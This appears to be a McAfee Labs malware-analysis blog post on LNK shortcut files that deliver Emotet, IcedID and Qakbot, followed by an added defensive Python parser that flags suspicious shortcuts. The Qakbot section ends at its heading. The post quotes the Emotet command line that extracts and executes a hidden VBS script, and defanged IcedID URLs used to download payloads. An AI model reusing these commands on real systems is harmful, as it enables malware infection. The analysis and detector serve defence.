An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. These files can be created manually using the standard right-click "create shortcut" option, or they are sometimes created automatically while running an application. Many tools are available to build LNK files, and some people have built "lnkbombs" tools specifically for malicious purposes.

During the second quarter of 2022, McAfee Labs saw a rise in malware being delivered using LNK files. Attackers are exploiting the ease of creating LNK files and are using them to deliver malware such as Emotet, Qakbot, IcedID, BazarLoader, and others.

Figure 1 – Geolocation of the LNK attacks seen from April to May

Below is a screenshot of how these shortcut files look to a normal user.

Figure 2 – LNK files as seen by a normal user

LNK THREAT ANALYSIS & CAMPAIGNS

In this blog, we will see how LNK files are being used to deliver malware such as Emotet, Qakbot, and IcedID. With Microsoft disabling Office macros by default, malware actors are now enhancing their lure techniques, including exploiting LNK files to achieve their goals. Threat actors are using email spam and malicious URLs to deliver LNK files to victims. These files instruct legitimate applications like PowerShell, CMD, and MSHTA to download malicious files. We will go through three recent malware campaigns, Emotet, IcedID, and Qakbot, to see how dangerous these files can be.

EMOTET Infection-Chain

Figure 3 – Emotet delivered via LNK file Infection-Chain

Threat Analysis

Figure 4 – Email received by the user with a malicious LNK attached

In Figure 4 we can see the lure message and the attached malicious LNK file. The user is infected by manually opening the attached LNK file. To dig a little deeper, we look at the properties of the LNK file:

Figure 5 – Properties of Emotet LNK sample

As seen in Figure 5, the Target field reveals that the LNK invokes the Windows Command Processor (cmd.exe). The target path shown in the Properties dialog is limited to 255 characters. However, command-line arguments can be up to 4096 characters, so malicious actors take advantage of this and pass long arguments that will not be visible in the properties.

Figure 6 – Contents of Emotet LNK file

In our case the argument is /v:on /c findstr "glKmfOKnQLYKnNs.*" "Form, US.lnk" > "%tmp%\YlScZcZKeP.vbs" & "%tmp%\YlScZcZKeP.vbs"

Once the findstr.exe utility matches the given string, the rest of the content of the LNK file is saved in a .vbs file under the %temp% folder with the random name YlScZcZKeP.vbs. The next part of the cmd.exe command invokes the VBS file using the Windows Script Host (wscript.exe) to download the main Emotet 64-bit DLL payload. The downloaded DLL is then executed using the regsvr32.exe utility, which is the same behavior as the Excel (.xls) based version of Emotet.

ICEDID Infection-Chain

Figure 7 – IcedID delivered via LNK file Infection-Chain

Threat Analysis

This attack is a perfect example of how attackers chain the LNK, PowerShell, and MSHTA utilities to target their victims. Here, the LNK invokes PowerShell with a highly obfuscated parameter, which can be seen in the Target field of the LNK properties in Figure 8.

Figure 8 – Properties of IcedID LNK sample

The parameter is exceptionally long and is not fully visible in the Target field. The whole obfuscated argument is decrypted at run time and then executes MSHTA with the argument hxxps://hectorcallecom/093789.hta. The downloaded HTA file invokes another PowerShell command with a similarly obfuscated parameter, but this one connects to the URI hxxps://hectorcallecom/listbul.exe, which downloads the IcedID installer, a 64-bit EXE payload, under the %HOME% folder.

QAKBOT Infection-Chain

Figure 9 – Qakbot delivered via LNK file Infection-Chain

Threat Analysis
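The Emotet chain above relies on two properties of shortcut files: the Properties dialog truncates the Target field, and a script appended after the Shell Link structures is invisible there but reachable by findstr. The following is an added example, not code from McAfee Labs or the post, that walks the Shell Link structures (header, LinkTargetIDList, LinkInfo, StringData, ExtraData, as laid out in the MS-SHLLINK specification) to recover the full argument string and to measure any bytes left after the TerminalBlock. The sample LNK it assesses is a constructed fixture carrying the argument string quoted above and a placeholder in place of the carved script; the constants, function names and the ASCII code-page assumption are mine.

```python
import struct
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80  # LinkFlags bits (MS-SHLLINK)
STRING_DATA = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
               (0x20, "arguments"), (0x40, "icon_location"))  # on-disk order

def parse_lnk(data):
    """Walk the Shell Link structures; return StringData fields plus any bytes after the TerminalBlock."""
    if len(data) < LNK_HEADER_SIZE or data[:20] != struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags, pos = struct.unpack_from("<I", data, 20)[0], LNK_HEADER_SIZE
    if flags & HAS_ID_LIST:  # 2-byte IDListSize, then the IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # 4-byte LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width, fields = (2 if flags & IS_UNICODE else 1), {}
    for bit, name in STRING_DATA:  # 2-byte CountCharacters, no terminator
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            raw = data[pos + 2:pos + 2 + count * width]
            fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")  # cp1252 assumed for ANSI
            pos += 2 + count * width
    while pos + 4 <= len(data):  # ExtraData blocks; a BlockSize < 4 is the TerminalBlock
        size = struct.unpack_from("<I", data, pos)[0]
        pos += size if size >= 4 else 4
        if size < 4:
            break
    return {"flags": flags, "overlay": data[pos:], **fields}

def assess_lnk(data):
    """Reasons an LNK resembles the self-carving Emotet sample; an empty list means nothing was flagged."""
    lnk = parse_lnk(data)
    args, findings = lnk.get("arguments", ""), []
    if len(args) > 255:
        findings.append("arguments exceed the 255 characters the Properties dialog shows")
    if "findstr" in args.lower() and ".lnk" in args.lower():
        findings.append("findstr reads a .lnk file: the script is carved out of the shortcut itself")
    if lnk["overlay"].strip(b"\x00"):
        findings.append("%d bytes appended after the Shell Link structure" % len(lnk["overlay"]))
    return findings

def build_sample(arguments, appended):
    """Constructed fixture: bare Shell Link holding only an arguments string, then `appended` as overlay."""
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, 0x20 | IS_UNICODE, *[0] * 6, 1, *[0] * 4)
    return header + struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le") + b"\0\0\0\0" + appended

SAMPLE_ARGS = '/v:on /c findstr "glKmfOKnQLYKnNs.*" "Form, US.lnk" > "%tmp%\\YlScZcZKeP.vbs" & "%tmp%\\YlScZcZKeP.vbs"'  # from the post
SAMPLE_OVERLAY = b"glKmfOKnQLYKnNs\r\n' constructed placeholder lines standing in for the carved script\r\n"
```

Running `assess_lnk(build_sample(SAMPLE_ARGS, SAMPLE_OVERLAY))` on the fixture reports both the findstr-on-.lnk pattern and the appended overlay; a real sample on disk can be read with `open(path, "rb").read()` and passed in the same way.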